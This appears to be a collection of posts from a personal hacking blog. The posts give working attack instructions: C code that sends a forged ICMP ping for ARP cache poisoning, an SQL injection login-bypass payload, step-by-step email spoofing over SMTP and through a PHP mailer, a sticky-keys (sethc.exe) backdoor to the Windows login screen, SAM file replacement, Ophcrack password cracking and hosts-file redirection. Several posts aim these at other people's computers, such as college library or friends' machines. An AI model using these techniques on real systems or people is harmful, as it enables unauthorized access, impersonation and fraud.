Hack google hurdle race

     Today morning when I opened google, I saw the hurdles. I tried it. I am not so good with games. I can't even come within 20 seconds. But my friends are doing good and my office's best record is 10.6 seconds with two medels. So the crowd is at the top runners' desk.

     I decided to pull the crowd towards me. I am a programmer than a gammer. I did it in my way. Here is my result.

    It is very simple. Do the following.

• Use firefox installed with firebug addon or chrome.
• Play the game and finish it. (you take your own time. Don't hurry. Slow and study wins the race ;-)
• In chrome open settings -> Tools -> Developer tools. In firefox open firebut by Tools -> firebug or clicking the bug image at the right bottom cornor of your firefox.
• Now  you can edit the page code in realtime.
• Everything is under the div with id hplogo_sb
• Under that div, you can see four elements. hplogo_sbt is for the score and three hplogo_sm are for the medels.
• Change hplogo_sbt's value to whatever you want. Even negetive as I do.
• And change the class value of all hplogo_sm to hplogo_smg. If the hplogo_sm's class value is hplogo_smh, the medel is not granted. If you change it to hplogo_smg, it will be granted.
• Now call your friends and get popular

Now the entire crowd is at my desk ;-)

forge ping (send forged icmp ping request)

     Linux is providing a wonderful platform for programmers also hackers ( better programmers). The one that admired me recently is the RAW-SOCKET. It allows you to send any packet yourself into your network. A well written network packet can do many things. Here in this post I shared a code to send a forged ping request.

     Ping, we all know, a regular network command. We (or else me) always use this command to check whether our computer is connected with the network. Nothing else. But also the ping does one important job of updating the ARP cache. So with a forged ping request we can easily poison the cache of all the host in the network. [Read more about ARP cache poisoning to get better understanding. May be in future I will write a blog entry on ARP cache, if I write a working example.]

Here is the code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <linux/icmp.h>
#include <arpa/inet.h>
#include <errno.h>

#define SOURCE_ADDR "43.88.80.34"
#define DEST_ADDR "43.88.80.135"

int write_ip_header (void *);
void write_icmp_header (void *);
unsigned short calculate_checksum (unsigned short *, int len);

int main () {
    int sockfd;
    sockfd = socket (PF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (socket < 0) {
        perror ("socket failed");
        return -1;
    }

    char *packet = malloc (4096);
    if (!packet) {
        perror ("malloc failed");
        return -1;
    }

    memset (packet, 0, 4096);

    struct sockaddr_in to_addr;
    to_addr.sin_family = AF_INET;
    to_addr.sin_port = htons (23);
    inet_pton (AF_INET, DEST_ADDR, &to_addr.sin_addr);
   
    write_icmp_header (packet);
    int tot_len = write_ip_header (packet);

    int one = 1;
    if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof (one)) < 0) {
        perror ("setsockopt faild: ");
        return -1;
    }

    if (sendto(sockfd, packet, tot_len, 0, (struct sockaddr *) &to_addr, sizeof (to_addr)) == -1) {
        perror ("sendto failed");
        return -1;
    }

    return 0;
}

int write_ip_header (void *packet) {

    struct iphdr *iph = (struct iphdr *) packet;

    iph->ihl = 0x5;
    iph->version = 0x4;
    iph->tos = 0;
    iph->tot_len = htons (sizeof (struct iphdr) + sizeof (struct icmphdr));
    iph->id = htons (1234);
    iph->frag_off = 0;
    iph->ttl = htons (16);
    iph->protocol = 1; //ICMP
    iph->check = 0;
    iph->saddr = inet_addr (SOURCE_ADDR);
    iph->daddr = inet_addr (DEST_ADDR);

    iph->check = calculate_checksum ((unsigned short *) packet, ntohs (iph->tot_len));
    printf ("ip checksum: %x\n", iph->check);

    return ntohs (iph->tot_len);
}

void write_icmp_header (void *packet) {

    struct icmphdr *icmph = (struct icmphdr *) ((char *)packet + sizeof (struct iphdr));

    icmph->type = 8;
    icmph->code = 0;
    icmph->checksum = 0;
    icmph->un.echo.id = htons (123);
    icmph->un.echo.sequence = 0;

    icmph->checksum = calculate_checksum ((unsigned short *) icmph, sizeof (struct iphdr));
    printf ("icmp checksum: %x\n", icmph->checksum);
}

unsigned short calculate_checksum (unsigned short *buf, int len) {
    unsigned long int sum;

    for (sum = 0; len > 1; len -= 2) {
        sum += *buf++;
    }

    if (len) {
        sum += (unsigned char) *buf;
    }

    while (sum >> 16) {
        sum = (sum >> 16) + (sum & 0xffff);
    }

    return (unsigned short) ~sum;
}

     Just edit the macros SOURCE_ADDR and DEST_ADDR to any valid IP address you like.

     I tried this code. It is perfectly working on my CentOS maching. I think it will work on all Linux distribution. But I didn't test. Sorry I just wrote this program for fun. So I didn't add any comment lines. Feel free to ask any questions.

SQL injection

Sql stands for Structured Query Language. Its a language used for querying database. In most of the websites, this is been used. In websites it is used for store and retrieve user information from databases. For example, the login username and password will be compared with the data retrieved for the user information database. So Sql is used in a wide range of websites.

But the websites using sql as back-end are facing a vulnerability known as sql injection. It is very critical one, which should be eliminated from any websites. Because using this vulnerability, anyone can spoof other users who are registered in that website. 

Here in this post, first we will see how sql is been used and then we are going to see how to perform sql injection.

In any website that asks user to login will prompt to enter the username and the password. Those information will be used to frame a query that will be sent to the database. For example in an ordinary login page, you are providing your username as arun and the password as arunasks as int this figure, 

 

those data will be placed in a query like this

select * from user_info where username='arun' and password='arunasks'

consider in this website, user_info is the database table that stores the user information. So this query will return details of a user whose username is arun and the password is arunasks. If no user having this username and the password, you will be returned an error message as login failed. This is what actually happens.

See here in the query, the data that entered in the username field and the password field will be inserted in the appropriate position. So if you insert username as 

x' or '1'='1' -- and enter whatever(blank now) in the password. 

 

Then the query will be framed as,

select * from user_info where username='x' or '1'='1'-- and password =''

so now even the username is wrong, the or condition one equal one is true. and in sql '--' is the comment line. so anything after '--' won't be considered. So you will be logged in.

Not only this method. There are millions of methods in Sql injection. As much as you are creative, you will get more and more.

Forgot Firefox password (Reset firefox password)

some days b4 i have set master password for my firefox. But the next day I forgot that password. I was struct. I dono what to do next. I posted in Buzz for help. But no use :-(. So sad of me na. After I Googled about reseting firefox password. And finally I got it.

• just type the following line in the address bar of your firefox browser without cotes "chrome://pippki/content/resetpassword.xul"
• It will ask for confirmation. 
• If you give ok, your password will be simply reseted.

Note: Remember one thing, if you reset your master password, all your stuffs saved in your browser using that master password will be lost.

Email spoofing 2

In the last post we have seen about mail spoofing using SMTP server. But the problem is, many email providers won't allow mails coming from untrusted IP address. In this method we are going to hire a trusted IP to send spoofed mail.

There are a number of web hosting servers available online and they have mail sever installed in them. The IP of these servers will be trusted by any mail providers. And many of the web hosting severs are available for free. So simply use them to send your spoofed mail. 

There is a function mail() in php to send mail through mail server. We are going to use that function to send our mail. I have already written the code and uploaded it in 4shared website. There are two files. One is a html form that will ask you for the information about the mail. And the second is the php file, that is going to sent the mail. So register for a web hosting having mail server. And upload the files, can be downladed from this link. Now open the mail.html page. Send your mail.

For example, consider as you are registering at x10hosting.com. And you choose the sub domain name as ihacked, then your website will be ihacked.x10hosting.com. Now login in the cpanel of your site and upload the file can be downloaded from the above link. Now open ihacked.x10hosting/mail.html. There will be form appear  asking for the mail details. Just fill the form and have fun.

You can test this in the page I have created. Find the page at here.You can send anonymous from that page. Please don't misuse it. Just have fun ;-P.

Email spoofing 1

E-mail spoofing is nothing but sending mail anonymous. Also you can send mail as coming from some one else  email. This is very old method. This is not a hack actually. When e-mail was introduced, people sent email only by this method. 

For this you need a SMTP server (Simple Mail Transfer Protocol). You can use any SMTP server. You can download one here. And install it in your machine. Actually a SMTP server will run in the port 25. That is the default port for any mail server.

After installing it, connect it via telnet in command prompt using the command "telnet 127.0.0.1 25". Here the IP address refers your own machine. If you type 127.0.0.1 IP from any machine, it will refer only the machine itself. And the 25 is port number. But most of the times Windows don't allow telnet. So it may automatically close. In this situation, use some telnet client. You can download one here. Its a free utility and also portable, so it doesn't need any installation. 

Run it. Fill the required field and open the connection with the SMTP server. And use the following commands in the order to send mail.

helo /any name/

This is just introducing you to the SMTP server. Here you can use any name. It won't affect the mail you are going send. It is just saying hello to the server.

mail from:/from address/

This is the from address of the mail. You can use any mail address. That will appear as the from address of the mail. There should be no space between the colon (:) and the from address.

rcpt to:/to address/

This is the receiver address. The mail will be delivered only to this address. Here also no space between colon and the to address. 

data

This is the data portion of the mail. You can add any number of header required in this part. All the headers will be in the format /header name/:/header value/. Also no space between the colon and the values. Each header should be typed in a separate line. After adding all the headers, give two line break (type enter for two times). Now type the message. After finishing the mail type ctrl and dot then again ctrl ( ctrl.ctrl ) to represent the end of the mail. The mail will be sent to the receptant address. Type exit to close the program.

eg:

• helo hacker
• mail from:billg@microsoft.com
• rcpt to:kumaran.4353@gmail.com
• data
  
  • sub:please help me
  Mr.Balakumaran, Microsoft corporation is hacked by some hackers and all the control is now with them. Here we can't do anything. So please help our corporation to get out of the hand of those hackers. /ctrl/./ctrl/
• exit

But the problem with this method, is nowadays many standard mail providers like Gmail are not accepting mails from all IP addresses. So most of the times your mail won't be sent. Also if sent, probably it will be saved in spam. So read the next post to overcome these problems.

Windows backdoor hack

You know to hack Windows. But this is a time consuming process. If you need to crack the same machine often, you better set a backdoor in the machine. A backdoor is nothing but an alternate way to enter. Read more about backdoor.

First know the concept. In Windows there is an option known as sticky key. That is for physically challenged people. It extends the life time of shift, ctrl, alt keys. To enable this, click shift key for five times. The program that is responsible for this is sethc.exe. The location of the file is "c:\windows\system32\sethc.exe". The specialty of this program is you can run this even before you login the machine. Thus if you click shift key for five times at the login screen, sethc.exe program will run.

If you able to run cmd.exe before logging in, you can change the password with "net user" command. So do the following.

• Copy cmd.exe from "c:\windows\system32\cmd.exe" to Desktop
• Rename the file to sethc.exe
• Now replace the original file with the name replaced cmd.exe file.
• Its over.

Now reboot the Windows machine. When the login screen appears, press shift for five times. Oh ****! the command prompt will appear. Hack the password with "net user administrator" command.

windows password hack 4

This is the attack that have 100% success rate. It is very simple. You know that the SAM file is the file containing password hashes. So simply replace that file with a password known SAM file. Attack over. But you can do this only with another OS. To do this,

• Boot the password known Windows machine with any Linux live CD, or your bootable USB.
• Make a copy of the SAM file.
• Now boot the machine that to be cracked with any Linux as live. 
• Replace the SAM file with the file already copied.
• Thats all. The machine is HACKED!

But usually I replace the entire config folder not only the SAM file. Thus the username also will be changed. Because the folder config manages all the user related information.

Windows password hack 3

In this third method you need a software named Ophcrack. There are many software available for cracking windows password. But I always prefer this one. Because it never ask you to do anything. It will simply give the password in your hand.

Ophcrack is a freely available opensource software. You can download it here. The software itself is very small one. But it needs some dictionary to crack. Those will be more weight. These dictionaries are the heart of this attack. They have a table consisting all permutations of all keyboard characters and their corresponding hashes. Actually these hashes will be compared with the password hash present in the SAM file. If a match found, the equallent word will be returned. This is known as dictionary attack.

To crack any Windows password, 

• Download Ophcrack as an ISO file. Download it here.
• Now write it in a CD or make your USB drive bootable with Ophcrack. Know how to make a USB bootable here. 
• And boot the Windows machine with Ophcrack.
• Wait till boot complete. You will have the password in minutes.

But the problem here is, your attack is limited with the dictionary you use. The dictionaries that are permutation of alphabet are free to download. But those consisting special character are not free. And also you have to download them. Read next post for a better hack.

Windows password hack 2

In our last post we have seen about the SAM file, which contains the password hash. In this post we are going to see about some simple steps to hack the password.

Consider you are in the position that you can access the administrator account but you don't know the password. Like in your college library where the system admin will type the password for you or you are checking mails at your friend's computer. You have accessed the admin account. You want to change the password. But you don't know the password. You have two ways.

First one is, create a new admin account and choose your desired password for it. Now logout from the current administrator account and login with the new administrator account created by you. From this account, you can delete the other account where you have logged in before. Also you can have a backup of the files belongs to the deleted administrator.

The second way is without knowing the password of the current account, changing it using command prompt. This can be performed only with administrator privilege. For this do the following steps.

1. Open command prompt by typing cmd in run. In Windows Vista and Windows 7, open it as administrator ( in start type cmd. it will appear. now right click it and give open as administrator ).
2. Type the command " net user \user name\ * " without cots. replace \user name\ with the username of the current account.
3. Now it will ask for new password. Type new password. Your typing won't appear in the screen. Type enter.
4. Retype the password. and click enter.
5. Now the password will be changed.

Read further to know more...

Windows password hack 1

Windows, the most widely used desktop operating system stores its password as a hash in a file. The file is named as SAM. You can find that file at the location C:\windows\system32\config\SAM. SAM file is not accessible by any user even the administrator. If you try to open this file, you will receive an error message as that file is being used by another program like this.

When a user adds his new password or changes his password to a new one, Windows generates the hash of that new password and stores it in the SAM file. When the user, boots the Windows machine, the process winlogon.exe ( you can see this in task manager ) will prompt him for the password. It generates the hash of the entered password and compares it with the saved hash at the SAM file. If only both are same, the user will be allowed to enter inside.

I found many of the people reading this bolg, looking at this blog. actually i gave just a simple introduction here about hacking windows password. the main dish is inside not here. read also other three articles in this series here. you will surely become a devil to microsoft-windows ;-)

DNS spoofing

DNS spoofing is nothing but while resolving the host name, instead of taking to the legitimate page taking to some other page. I know we everyone is not capable of hacking a Domain name server. But we can do it in our system. To do this you should have administrator privilege. 

In Windows there is a file at location c:\windows\system32\drivers\etc\hosts which is the first reference for any DNS resolving. Thus the Windows machine first look into that file before sending any DNS request. If any entry for the corresponding host is present, that particular IP address will be directly requested. No additional DNS lookup is needed. You can open that file in notepad and edit. But open as administrator.

That file will look like this (Microsoft copyrighted file)

# Copyright (c) 1993-2009 Microsoft Corp.

#

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

#

# This file contains the mappings of IP addresses to host names. Each

# entry should be kept on an individual line. The IP address should

# be placed in the first column followed by the corresponding host name.

# The IP address and the host name should be separated by at least one

# space.

#

# Additionally, comments (such as these) may be inserted on individual

# lines or following the machine name denoted by a '#' symbol.

#

# For example:

#

#      102.54.94.97     rhino.acme.com          # source server

#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.

# 127.0.0.1       localhost

# ::1             localhost

At present this file has no effect as every line in this file are comment line (started with a # symbol). You can add a line at the end like,

66.249.89.99    yahoo.com

This line has the IP address of Google but the host name is yahoo.com. Just add this line and save the file. Now if you enter yahoo.com in your browser, it will take you to google.com. It may seem as not so effective. But if you use it in a intelligent way, it'll serve a lot. For example, if you add entries for websites you visit frequently, every time you enter those websites in your browser, it won't need to resolve the name. So you can have a faster performance. And also not limited with it, you can do more.

DISCLAIMER: Information provided in this page and any of the page of this blog is only for informational purposes. Any activities done by the reader or any other person, the blog or the writer or the blog owner is not responsible for that.